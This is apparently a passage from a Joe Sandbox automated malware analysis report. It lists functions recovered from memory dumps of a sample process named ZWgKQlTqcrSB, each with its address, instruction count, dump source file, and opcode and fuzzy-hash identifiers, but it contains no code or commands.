                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6b31a336766fa0288ca7206d4f0500b3238813188ffcf0b297d2316696b4c237
                                                                                                                                                                          • Instruction ID: add70bcb032335064deab9ce69f1a012b1172fca49abbefb76b04b7012871b7f
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b31a336766fa0288ca7206d4f0500b3238813188ffcf0b297d2316696b4c237
                                                                                                                                                                          • Instruction Fuzzy Hash: C361C330E1E54E8EEBB5EBA88875ABC77A0FF55308F1545BAD00ED31E2DE286941C741
                                                                                                                                                                          Function 00007FFD9BF8BA01 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e7199c79a60dc1c779ab4bdce0bd872cfc9535c07dc22d1bfe700c850b864ecb
                                                                                                                                                                          • Instruction ID: a1f0b15a0d5e46d4bcf8ba9a4bf9b6c0320c3f9043461ff655f2b0d69f00ec26
                                                                                                                                                                          • Opcode Fuzzy Hash: e7199c79a60dc1c779ab4bdce0bd872cfc9535c07dc22d1bfe700c850b864ecb
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A717B30A4AF4A8FE379CF54C1A466277A1FF45304B55467DC48B87AA6CA3BB942CB40
                                                                                                                                                                          Function 00007FFD9BBC75F1 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b79f9764a283e32b5a185e8b65c4fce5e7a392baa05b25b40da1e65e9d60171f
                                                                                                                                                                          • Instruction ID: dd4d307a37e18f1319fcfd146ffb88c239f2249eb6eed53c1f4081e05c00b414
                                                                                                                                                                          • Opcode Fuzzy Hash: b79f9764a283e32b5a185e8b65c4fce5e7a392baa05b25b40da1e65e9d60171f
                                                                                                                                                                          • Instruction Fuzzy Hash: 41515D71E0995D8FDB94EFA8D895AEDBBB1FF59304F10006AD00DE7296DB34A981CB40
                                                                                                                                                                          Function 00007FFD9BF809DB Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b729e9691ccf8c56cbeb76f0ca6ffe7e7036388ec5524077dccf0480492ca574
                                                                                                                                                                          • Instruction ID: 8adf2f4994686287a1c3323c57e8c0e447f16551c008c80cfc3c6e9081993ab6
                                                                                                                                                                          • Opcode Fuzzy Hash: b729e9691ccf8c56cbeb76f0ca6ffe7e7036388ec5524077dccf0480492ca574
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51BF32A5A94E8EEB65DFB8C4605BCBBB0FF55700F9506B9D00FC61A2DA3A6941C740
                                                                                                                                                                          Function 00007FFD9BF8AD50 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1dcfc9389fafdbe4037dadbc327fbf3ca3117fe567c21ffde1fc39c4c2da1674
                                                                                                                                                                          • Instruction ID: a5d0ccaebc4fdedbcca605881bafc94491d08902a23b3f3ee256d13715bc2455
                                                                                                                                                                          • Opcode Fuzzy Hash: 1dcfc9389fafdbe4037dadbc327fbf3ca3117fe567c21ffde1fc39c4c2da1674
                                                                                                                                                                          • Instruction Fuzzy Hash: 9151E220A1DD5E8EEB78DB1884747F877A1FF94300F1546BAD04FC71A6CE396A858B41
                                                                                                                                                                          Function 00007FFD9BF850F2 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 76cdc132fadc3bceefbc93502ccf35170fe7ebfe0c35eaf5a3c5d9db9bea2189
                                                                                                                                                                          • Instruction ID: d2cd37c306ccf44b61d096224c549d30ec6d4595f5a1ca2c32f6c7e9de5e83db
                                                                                                                                                                          • Opcode Fuzzy Hash: 76cdc132fadc3bceefbc93502ccf35170fe7ebfe0c35eaf5a3c5d9db9bea2189
                                                                                                                                                                          • Instruction Fuzzy Hash: 74418C23B4DAAB4FE752BBBCA4B14E57BB09F01264B0542B7D05BC50D3DD1B65498281
                                                                                                                                                                          Function 00007FFD9BBC6EC7 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8da62d7af43f80af6b77e10a977cd6014c4e687ee389c989e63c898d653fbcda
                                                                                                                                                                          • Instruction ID: 7a90787e0047a2efb6dfcbdd1e5a9285d40fa229e29d25300926ba56801aacfd
                                                                                                                                                                          • Opcode Fuzzy Hash: 8da62d7af43f80af6b77e10a977cd6014c4e687ee389c989e63c898d653fbcda
                                                                                                                                                                          • Instruction Fuzzy Hash: 65416F3270C9098FDF98EF58C4A5DA473E1FFB932470445AAD08AC7292DE21EC45CB81
                                                                                                                                                                          Function 00007FFD9BF84537 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4e04df03250cb5f1a3c7f1bcdba3153f90d44d84ef71b56717a66c9d226a1093
                                                                                                                                                                          • Instruction ID: f0ff8da4b435b2b0af801c717ea722f76ec8479d0b3e7bce4c5daf796f8e72c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e04df03250cb5f1a3c7f1bcdba3153f90d44d84ef71b56717a66c9d226a1093
                                                                                                                                                                          • Instruction Fuzzy Hash: B9413D3270CD488FDF98EF1CC4A5DA4B7E1FBA931470502AAD44ED7692DE26E845CB81
                                                                                                                                                                          Function 00007FFD9BBCCEA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cdb01a84220ce949ff3f4b3ace03ba2de10fbb7fbb57db95858ee023cae71251
                                                                                                                                                                          • Instruction ID: a841ed50fb7a0d1b71ed193c793dc35cc986cf89e049a3f897216d752dca0229
                                                                                                                                                                          • Opcode Fuzzy Hash: cdb01a84220ce949ff3f4b3ace03ba2de10fbb7fbb57db95858ee023cae71251
                                                                                                                                                                          • Instruction Fuzzy Hash: 0931FC21A0F6CA5FE76697BC9C641B47F90AF53214B0A01FBD0898B0E3D608195AC3D1
                                                                                                                                                                          Function 00007FFD9BF8C528 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0d96dacbf35fbfdfad1232b76f2a7c23c6b0243c04177b10bc38f2353a74b7a6
                                                                                                                                                                          • Instruction ID: d9f441b77a0bad158378f627a69da19d342a99607b558c315adb5cad7c62b9c9
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d96dacbf35fbfdfad1232b76f2a7c23c6b0243c04177b10bc38f2353a74b7a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C41F520A1D45E4EFB7C9E5884706F8B7B1EF94300F5542BAD44EC72A6ED796E818780
                                                                                                                                                                          Function 00007FFD9BF8757B Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b0e60f5197746c24d94d949ce7b4e833bbca7f92354e35c8200c1b9d9027d784
                                                                                                                                                                          • Instruction ID: e211d9e7e0adbbd64f88d76a99239d3612271831e9b63117ce7c99b838fddc80
                                                                                                                                                                          • Opcode Fuzzy Hash: b0e60f5197746c24d94d949ce7b4e833bbca7f92354e35c8200c1b9d9027d784
                                                                                                                                                                          • Instruction Fuzzy Hash: 98419431A4EA9D4FDB56EBA8D8706E87FB0AF45310F0501ABD04AD71E3CA2569048751
                                                                                                                                                                          Function 00007FFD9BBC6F71 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9f5471976ccf587f519f8323b2bc7843ac34aa68e34503a779484e0c0ea45a76
                                                                                                                                                                          • Instruction ID: c7f394ffa6dc547102334561251f5bc2d419639314c1d882934b3f323c2b13b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5471976ccf587f519f8323b2bc7843ac34aa68e34503a779484e0c0ea45a76
                                                                                                                                                                          • Instruction Fuzzy Hash: 68315E3160C9498FDF9CEF18C0A5DA477E1FFB931570446AAD08AC72A2DE25EC45CB81
                                                                                                                                                                          Function 00007FFD9BF8C0D1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 858f333d8711376544062192604f593dc902cf76d4cd0dd646cc6ebec084cb99
                                                                                                                                                                          • Instruction ID: e4551477a177e2bd6009508c3f3ae9eabd4cce0356404c71571b78c82ee4824a
                                                                                                                                                                          • Opcode Fuzzy Hash: 858f333d8711376544062192604f593dc902cf76d4cd0dd646cc6ebec084cb99
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F314F31608A488FDF5DEF28C4A5E64B7E1FBA9314B0502AAD45EC7292CE25E945CB81
                                                                                                                                                                          Function 00007FFD9BF845E1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b52a2b4e33c52c567d27c03bb2d240a707b776dc0e79a9329c95a343d26acc2a
                                                                                                                                                                          • Instruction ID: 5eefad04a26f9d6d82cf5363e1a19282c1737b6b090b3396bfd2b344f8c6c39d
                                                                                                                                                                          • Opcode Fuzzy Hash: b52a2b4e33c52c567d27c03bb2d240a707b776dc0e79a9329c95a343d26acc2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 50314D3160CD588FDB9CEF1CC4A5E64B7E1FBA931470502AED44EC7692DE25E845CB81
                                                                                                                                                                          Function 00007FFD9BF849F0 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1ac759b52ef5096f03fb82568e5bb72f20c0361ba4fec1499305f3573933e0ad
                                                                                                                                                                          • Instruction ID: 6ef8ef5c008976724e5dd028bf86b3aa368020032b312c05c586c4ea765de35c
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ac759b52ef5096f03fb82568e5bb72f20c0361ba4fec1499305f3573933e0ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 95416212F1E1DB86F72A3BA864B16F93E504F42214B4A03F7D85F4A0F7AC0F2A545295
                                                                                                                                                                          Function 00007FFD9BBCA21A Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ffa64dc440c6165e35d1eee67ef45ed3365e6e4f83b24072b92378b4c9cf64b8
                                                                                                                                                                          • Instruction ID: 7c19cbbf39ca0f1b725aac3448edef3a26e9429b0477ea2e0d1b192c94f00fa4
                                                                                                                                                                          • Opcode Fuzzy Hash: ffa64dc440c6165e35d1eee67ef45ed3365e6e4f83b24072b92378b4c9cf64b8
                                                                                                                                                                          • Instruction Fuzzy Hash: 12412320E1D49E8AEB78E65C84B06B477A1FF50308F1545BAD48EC75E6CD2C7A82C741
                                                                                                                                                                          Function 00007FFD9BBC6F0B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d4db0eafe3dcef8e53ae67fa10eecb5f1f7a4bd0e268bb3ebf6888657eabf770
                                                                                                                                                                          • Instruction ID: a34554bf7e8c11705b4c8841b7d87fdde066f3c4a67c69870c5cdb9bc1c06279
                                                                                                                                                                          • Opcode Fuzzy Hash: d4db0eafe3dcef8e53ae67fa10eecb5f1f7a4bd0e268bb3ebf6888657eabf770
                                                                                                                                                                          • Instruction Fuzzy Hash: B1314D3170C9498FDF98EF18C0A5DA473E2FFB931470445AAD08AC72A2DE25EC85CB81
                                                                                                                                                                          Function 00007FFD9BF8C06B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8830be7d383aa7578eb20c0d798209f8618fe227e0b60d48598bacbee49fbc54
                                                                                                                                                                          • Instruction ID: 59f2e70406e9c7ace39bbba883fb55c98da844244304c8616ecf4989790b2adc
                                                                                                                                                                          • Opcode Fuzzy Hash: 8830be7d383aa7578eb20c0d798209f8618fe227e0b60d48598bacbee49fbc54
                                                                                                                                                                          • Instruction Fuzzy Hash: F43130316089498FDF59EF28C0A5EA4B3E1FBA9314B0542AAD05EC7292CE35E945CB81
                                                                                                                                                                          Function 00007FFD9BF8457B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8057636fecf307cc7be7ae2235fe49b16fb430ca474db51fec78800baf2677c
                                                                                                                                                                          • Instruction ID: 7fb6720f3d996044d5174a1e387397276bf67bb8fceeea27067911369d7a0059
                                                                                                                                                                          • Opcode Fuzzy Hash: c8057636fecf307cc7be7ae2235fe49b16fb430ca474db51fec78800baf2677c
                                                                                                                                                                          • Instruction Fuzzy Hash: E1313D3170CD498FDF98EF18C0A5EA4B7E1FBA931470502AED44ED7692DE25E845CB81
                                                                                                                                                                          Function 00007FFD9BF8BE35 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4fac71adea9bb0661ea200639190e4ba220cc9fe080716ba5b9b96a210cfb58d
                                                                                                                                                                          • Instruction ID: 8b1b00e7fc49d3e269c9cc58f058670bc8fbc13e5de8bed110bc72c3aa04133b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4fac71adea9bb0661ea200639190e4ba220cc9fe080716ba5b9b96a210cfb58d
                                                                                                                                                                          • Instruction Fuzzy Hash: 70311630A5AD4ECFEBA8DF9484A15BD77A1FF54300F52027AD11FD61A2CA3B6A008B41
                                                                                                                                                                          Function 00007FFD9BBC1E1D Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 03fdd3335977546a5da92709645770973189e70476500749bc78e7b409e36588
                                                                                                                                                                          • Instruction ID: d79469f3923b8d73516b64f2c5e1c6b61824f2035d64ce73566543043ec8fe91
                                                                                                                                                                          • Opcode Fuzzy Hash: 03fdd3335977546a5da92709645770973189e70476500749bc78e7b409e36588
                                                                                                                                                                          • Instruction Fuzzy Hash: 3731383070E24A4FD755FB68C0E59B57B90AF51310B1682FAD408CF1EBDA29ED46C381
                                                                                                                                                                          Function 00007FFD9BBCAFFA Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ec26e686ab8520aa4def0328d4be64011b51e956d527b61c5fee27c909bdf092
                                                                                                                                                                          • Instruction ID: f66ed29e38a4b2ff2dab420d3e96ca48cb3cb32951860be30ce653580bdcf3ea
                                                                                                                                                                          • Opcode Fuzzy Hash: ec26e686ab8520aa4def0328d4be64011b51e956d527b61c5fee27c909bdf092
                                                                                                                                                                          • Instruction Fuzzy Hash: EB319131E1EA9D9FDBA5EB98C8B09FC7BB0FF58304F15416AD019E72E2CA246905C741
                                                                                                                                                                          Function 00007FFD9BBC402D Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7f4d2f89ef9ab661c13b205ae164cc2b9d807482959ed7a091c079348ac77bf6
                                                                                                                                                                          • Instruction ID: 70cfeb1d0632dedd376ef37613297c1c6d21398446313ea2bc8964460ea6d239
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f4d2f89ef9ab661c13b205ae164cc2b9d807482959ed7a091c079348ac77bf6
                                                                                                                                                                          • Instruction Fuzzy Hash: 04215EB1B0990A9FDB98EB9CC4A1978B3A2FF983147518139D00ED3695CF24B952CB80
                                                                                                                                                                          Function 00007FFD9BF83231 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eaf44a6c72d60b5308808990587fa6c5b1c932e49c60425ed2ff2d5849c51f53
                                                                                                                                                                          • Instruction ID: 13b7e0c215e0da1db7823dad812a57a04f0e2a4f47005096489fe53d8dde573d
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf44a6c72d60b5308808990587fa6c5b1c932e49c60425ed2ff2d5849c51f53
                                                                                                                                                                          • Instruction Fuzzy Hash: 59215B10B5D89A4AE7398A9484705B87B51EF8230171947BAE08BCF4B7D83DA9898340
                                                                                                                                                                          Function 00007FFD9BBC479C Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 14090b0d8504fb9e6d948f861681ab3fac0c8dcfefd02e960ac9a3e8611a9e24
                                                                                                                                                                          • Instruction ID: 8ff7f10a93068704488a0059ba350c948241314f2b74dadde9971c3d37ec7eb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 14090b0d8504fb9e6d948f861681ab3fac0c8dcfefd02e960ac9a3e8611a9e24
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C217130B2D6498BE678EA8C956013973E1FF95308B22053DD4CFD36E1DA24BB018646
                                                                                                                                                                          Function 00007FFD9BBC6CEC Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
